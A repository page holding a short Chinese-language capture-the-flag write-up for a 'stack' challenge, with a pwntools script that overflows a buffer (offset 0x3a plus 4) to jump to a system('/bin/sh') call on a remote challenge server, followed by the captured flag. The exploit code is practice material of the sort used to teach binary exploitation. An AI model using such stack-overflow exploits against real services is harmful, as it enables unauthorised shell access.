You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
大蒟蒻 365ceb7e2f
Sun, 31 Mar 2019 13:26:41 GMT
7 years ago
..
README.md Sun, 24 Feb 2019 22:31:06 +0800 7 years ago
stack.py Sun, 24 Feb 2019 22:31:06 +0800 7 years ago
vitamin Sun, 31 Mar 2019 13:26:41 GMT 7 years ago
vitamin.i64 Sun, 31 Mar 2019 13:26:41 GMT 7 years ago

README.md

stack

用ida一看找到字符串和ebp差0x3a,然后发现在0x080491E2system("/bin/sh")。没了。

from pwn import *
pld = 'A' * (0x3a + 4) + p32(0x080491E2)
p = remote("159.65.68.241", 10003)
p.sendline(pld)
p.interactive()

flag{e46f5601-086c-4f06-bcb2-a021e104c5e5}